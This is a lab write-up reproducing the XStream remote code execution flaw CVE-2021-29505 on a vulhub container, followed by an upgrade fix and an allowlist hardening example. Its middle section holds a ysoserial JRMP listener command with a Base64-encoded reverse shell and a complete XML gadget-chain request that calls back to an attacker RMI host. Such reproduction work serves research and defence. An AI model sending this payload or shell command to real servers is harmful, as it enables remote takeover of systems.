XStream Remote Code Execution (CVE-2021-29505)

I. Introduction and description

XStream is an object/XML mapping (OXM) framework for serializing Java objects to XML and back. Serializing JavaBeans or deserializing XML files requires no auxiliary classes or mapping files, which removes most of the tedium from XML serialization. Because XStream instantiates whatever types the input names, an attacker who controls the processed input stream can replace or inject objects and, through a chain of JDK classes, cause arbitrary code loaded from a remote server to be executed.

II. Affected versions:

XStream <= 1.4.16

III. Environment setup:

https://raw.githubusercontent.com/vulhub/vulhub/master/xstream/CVE-2021-29505/docker-compose.yml

File: docker-compose.yml

```yaml
version: '2'
services:
  web:
    image: vulhub/xstream:1.4.16
    ports:
      - "8080:8080"
```

```shell
docker-compose up -d
```

The image has started:

Access the address: http://192.168.0.106:8080/

IV. Reproducing the vulnerability

Start the service:

Start the JRMP listener; the reverse-shell command is Base64 encoded:

```shell
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 1098 CommonsCollections6 "bash -c {echo,L2Jpbi9iYxxxxxxxxPiYx}|{base64,-d}|{bash,-i}"
```

Screenshot of the execution process:

Run the PoC:

Reverse shell obtained:

Full request:

```http
POST / HTTP/1.1
Host: 192.168.0.106:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: application/xml
Content-Length: 3115

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
              <aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
                <candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
                  <names>
                    <string>aa</string>
                    <string>aa</string>
                  </names>
                  <ctx>
                    <environment/>
                    <registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
                      <java.rmi.server.RemoteObject>
                        <string>UnicastRef</string>
                        <string>192.168.0.102</string>
                        <int>1098</int>
                        <long>0</long>
                        <int>0</int>
                        <long>0</long>
                        <short>0</short>
                        <boolean>false</boolean>
                      </java.rmi.server.RemoteObject>
                    </registry>
                    <host>192.168.0.102</host>
                    <port>1098</port>
                  </ctx>
                </candidates>
              </aliases>
            </nullIter>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>
```

V. Remediation:

Upgrade XStream to version 1.4.17 or later (replace the older XStream version in the Maven pom.xml):

```xml
<dependency>
  <groupId>com.thoughtworks.xstream</groupId>
  <artifactId>xstream</artifactId>
  <version>1.4.17</version>
</dependency>
```
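Upgrading closes the gadget chain used above, but XStream also lets the application declare an explicit allowlist of types, so an XML document that names any class the application never expects (such as the RMI registry stub or `Rdn$RdnEntry` referenced by the payload) is refused before the object is instantiated. The following Java class is an added example, not code from this write-up, from vulhub, or from the XStream project. The `Order` bean is a hypothetical application type, the inputs are constructed for the demonstration, and the code assumes XStream 1.4.17 or later as recommended above (the `addPermission`/`allowTypes` API has existed since 1.4.7).

```java
import com.thoughtworks.xstream.XStream;
import com.thoughtworks.xstream.security.ForbiddenClassException;
import com.thoughtworks.xstream.security.NoTypePermission;
import com.thoughtworks.xstream.security.NullPermission;
import com.thoughtworks.xstream.security.PrimitiveTypePermission;

public class XStreamHardening {

    // Hypothetical application bean; stands in for whatever the real service deserializes.
    public static class Order {
        public String id;
        public int quantity;
    }

    /** Builds an XStream instance that only deserializes explicitly allowed types. */
    public static XStream hardenedXStream() {
        XStream xs = new XStream();
        // NoTypePermission.NONE clears every existing permission (including the
        // permissive defaults of pre-1.4.18 releases) so the allowlist starts empty.
        xs.addPermission(NoTypePermission.NONE);
        // Re-allow only what the application actually needs.
        xs.addPermission(NullPermission.NULL);
        xs.addPermission(PrimitiveTypePermission.PRIMITIVES);
        xs.allowTypes(new Class[] { String.class, Order.class });
        // For a larger model, a package wildcard keeps the list maintainable:
        // xs.allowTypesByWildcard(new String[] { "com.example.app.model.**" });
        xs.alias("order", Order.class);
        return xs;
    }

    /** Returns true if the document was accepted, false if the allowlist rejected it. */
    public static boolean accepts(XStream xs, String xml) {
        try {
            xs.fromXML(xml);
            return true;
        } catch (ForbiddenClassException e) {
            // Thrown by XStream's SecurityMapper when the resolved class is not permitted.
            return false;
        }
    }

    public static void main(String[] args) {
        XStream xs = hardenedXStream();

        // Constructed benign input: an ordinary application bean.
        String benign = "<order><id>A-1</id><quantity>2</quantity></order>";
        Order o = (Order) xs.fromXML(benign);
        System.out.println("accepted: " + o.id + " x" + o.quantity);

        // Constructed probe naming a JDK class outside the allowlist (XStream encodes
        // '_' in element names as '__', so this resolves to sun.rmi.registry.RegistryImpl_Stub).
        // No network activity happens: the type check fires before any object is created.
        String probe = "<sun.rmi.registry.RegistryImpl__Stub/>";
        System.out.println("probe accepted: " + accepts(xs, probe)); // expected: false
    }
}
```

With this configuration the rejection surfaces as a `ForbiddenClassException` at the parsing layer, which is a cheap signal to log and alert on: a production endpoint that only ever expects `Order` documents should never see a request naming `sun.rmi.*` or `javax.naming.*` types.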


Disclaimer: the tools and procedures (methods) provided on this site may be offensive in nature and are intended only for security research and teaching; use them at your own risk.
